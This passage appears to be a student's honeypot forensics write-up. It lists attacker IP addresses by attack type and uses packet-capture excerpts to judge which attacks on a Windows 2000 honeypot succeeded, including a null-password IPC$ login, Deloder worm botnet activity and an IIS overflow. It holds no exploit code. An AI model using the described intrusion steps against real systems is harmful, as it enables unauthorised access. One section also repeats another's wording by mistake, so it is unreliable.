68.152.53.138

68.154.11.82

80.181.116.202

81.114.77.37

81.202.125.5

81.50.177.167

210.22.204.101

24.197.194.106

W32.HLLW.Deloder Worm: 61.111.101.78

Code Red Worm:

Retina CodeRed Scanner: 68.169.174.108

Code Red Worm: 218.25.147.83

Other IIS Buffer Overflows:

24.197.194.106

210.22.204.101

Directory Traversing Vulnerability:

24.197.194.106

FX-Scanner:

Accessed FTP: 141.85.37.78 and 203.170.177

Accessed port 57 and HTTP: 192.130.71.66 and 213.23.49.158

DameWare Remote Control Agent Vulnerability

210.22.204.101

Microsoft SQL Server Vulnerability

12.252.61.161

12.253.142.87

12.83.147.97

168.243.103.205

192.215.160.106

194.199.201.9

200.135.228.10

200.50.124.2

205.180.159.35

206.149.148.192

210.111.56.66

212.122.20.74

212.162.165.18

213.122.77.74

213.170.56.83

216.192.145.21

216.229.73.11

217.35.65.9

218.244.66.32

218.4.48.74

218.4.65.115

218.4.87.137

218.4.99.237

218.92.13.142

219.145.211.132

219.145.211.3

24.167.221.106

24.74.199.104

4.33.244.44

61.132.88.50

61.132.88.90

61.134.45.19

61.150.120.72

61.150.72.7

61.177.56.98

61.177.62.66

61.185.212.166

61.185.215.42

61.185.242.190

61.185.29.9

61.203.104.148

61.8.1.64

66.233.4.225

66.81.131.17

67.201.75.38

67.81.161.166

68.37.54.69

68.45.123.130

68.84.210.227

81.57.217.208

rpc.statd Vulnerability

204.50.186.37

212.243.23.179

Hack´a´Tack

62.150.170.134

62.150.170.232

SOCKS Vulnerability

200.74.26.73

3. Which attacks were successful?

Windows 2000 NetBIOS vulnerabilities

Those attackers that attempted to map the C drive through port 137 were unsuccessful.

8 0.514274 219.118.31.42 172.16.134.191 SMB Tree Connect AndX Request, Path: \\PC0191\C

9 0.517180 172.16.134.191 219.118.31.42 TCP netbios-ssn > 2388 [RST] Seq=2476847245 Ack=1943715703 Win=0 Len=0

In packet #9, the honeypot returned the [RST] bit (RESET) which means that it could not establish a connection. This would have worked on an older version of Windows. However, in Windows 2000, the attacker has to log onto the IPC$ share instead like this:

925 322205.478544 210.22.204.101 172.16.134.191 SMB Tree Connect AndX Request, Path: \\172.16.134.191\IPC$

294 236849.783405 172.16.134.191 195.36.247.77 SMB Tree Connect AndX Response

All the attackers that logged into the honeypot through the IPC$ share were successful. They logged in to the Administrator account using the NULL password.

W32.HLLW.Deloder Worm

61.111.101.78 succeeded in exploiting the honeypot with the Deloder Worm. As I described in the Vulnerabilities section, the worm logged in through the IPC$ share and installed the PSEXESVC.EXE and INST.EXE files. Right after 61.111.101.78 finished communicating with the honeypot, the honeypot began attempting to log on to the IRC servers like so:

34821 412112.717027 172.16.134.191 209.126.161.29 TCP 1127 > 6667 [SYN] Seq=3377670478 Ack=0 Win=16384 Len=0

35739 412630.079021 172.16.134.191 66.33.65.58 TCP 1129 > 6667 [SYN] Seq=3523948626 Ack=0 Win=16384 Len=0

35745 413286.204510 172.16.134.191 63.241.174.144 TCP 1133 > 6667 [SYN] Seq=3688527302 Ack=0 Win=16384 Len=0

35762 413307.053048 172.16.134.191 217.199.175.10 TCP 1139 > 6667 [SYN] Seq=3694305514 Ack=0 Win=16384 Len=0

35794 414909.249998 172.16.134.191 209.196.44.172 TCP 1152 > 6667 [SYN] Seq=4114925005 Ack=0 Win=16384 Len=0

This tells us that 61.111.101.78 successfully exploited the honeypot and executed commands on the honeypot telling it to log on to an IRC Server and await commands. The honey pot succeeded in logging in to the IRC Server 209.196.44.172. This IRC chatroom is a botnet that interacted with at least 6639 distinct hosts while the honeypot was logged in. A little while after the honeypot logged into the botnet, it received an order to send the following packets:

39390 418489.571532 172.16.134.191 199.107.7.2 TCP 4828 > 31337 [SYN] Seq=892599022 Ack=0 Win=16384 Len=0

39394 418492.509669 172.16.134.191 199.107.7.2 TCP 4828 > 31337 [SYN] Seq=892599022 Ack=0 Win=16384 Len=0

39397 418498.652595 172.16.134.191 199.107.7.2 TCP 4828 > 31337 [SYN] Seq=892599022 Ack=0 Win=16384 Len=0

These packets were an attack on 199.107.7.2. They were sent to TCP port 31337 which is the port that Back

Orifice and a number of other Trojans run on. However the honeypot received no response from 199.107.7.2.

Code Red Worm

After 218.25.147.83 launched the Code Red attack on the honeypot, it no longer interacted with the honeypot. Since the honeypot did not proceed to send the Code Red virus to other machines, I am assuming that the attack was unsuccessful.

Other IIS Buffer Overflows

24.197.194.106 attempted a buffer overflow similar to the one described in the Vulnerabilities section. However, it was unable to exploit the honeypot.

It appears that the buffer overflow attempted by 210.22.204.101 was successful. Right after the buffer overflow, 210.22.204.101 was able to successfully connect with the honeypot on TCP port 4899 which is the Remote Administrator port. The Remote Administrator is used to control a computer remotely. It is often used by technical support staff to assist someone in fixing their computer. 210.22.204.101 uses the Remote Administrator to surf the internet in search of two tools: ZipCentral (zcsetup.exe) and FoundStone Fport (fport.zip). The ZipCentral program is presumably used to unzip the Fport program. Fport is a legitimate utility used to identify unknown open ports. The files requests appear below:

18726 332245.693463 172.16.134.191 217.151.192.231 HTTP GET /users/z/zcentral/zcsetup.exe HTTP/1.1

20815 335390.704047 172.16.134.191 216.154.242.126 HTTP GET /knowledge/zips/fport.zip HTTP/1.1

The attacker successfully downloads the files. Most likely, the attacker plans on using the honeypot to scan other computers and attack them at a later date. He has probably left a backdoor on the honeypot.

Directory Traversing Vulnerability

24.197.194.106 attempted to exploit the honeypot’s IIS using directory traversing. There is no reason to believe that it succeeded.

FX-Scanner

The scans were successful, but the honeypot was not harmed.

DameWare Remote Control Agent Vulnerability

DameWare Remote Control Agent was not running on the honeypot and port 6129 was not open so an attack was unsuccessful.

Microsoft SQL Server Vulnerability

Microsoft SQL Server was not running on the honeypot and port 1434 was not open so an attack was unsuccessful.

rpc.statd Vulnerability

Microsoft SQL Server was not running on the honeypot and port 111 was not open so an attack was unsuccessful.

Hack´a´Tack

The Hack´a´Tack was unsuccessful.

SOCKS Vulnerability

SOCKS was not running on the honeypot and port 1080 was not open so an attack was unsuccessful.

General Questions

1. What did you learn about analysis as a result of studying this scan?

I learned how to use Ethereal and Snort for the first time. I discovered how many different attacks are out there and how vulnerable Windows 2000 is. My fundamental understanding of packet-based networking has improved.

2. How do you anticipate being able to apply your new knowledge and skills?

First of all, I will update my own Windows 2000 system. I feel that upon graduating from college, I will be able to put these new skills to use in my profession.

3. How can we improve the SotM challenge? What would you like to see added? What would you like to see done differently?

No complaints.

Sources and Useful Links:

A Short IRC Primer: http://www.irchelp.org/irchelp/ircprimer.html

Just What is a Botnet? http://zine.dal.net/previousissues/issue22/botnet.php

Ports List: http://www.neohapsis.com/neolabs/neo-ports/neo-ports.html

Buffer Overflow in IIS info: http://www.eeye.com/html/Research/Advisories/AD20010618.html

Deloder Worm Analysis: http://www.klcconsulting.net/deloder_worm.htm

Input Validation Problem in rpc.statd: http://www.cert.org/advisories/CA-2000-17.html

Firewall Forensics: http://www.robertgraham.com/pubs/firewall-seen.html

"Code Red" Worm Exploiting Buffer Overflow In IIS: http://www.cert.org/advisories/CA-2001-19.html

TCP 6129 ? Dameware: http://lists.insecure.org/lists/incidents/2002/Aug/0107.html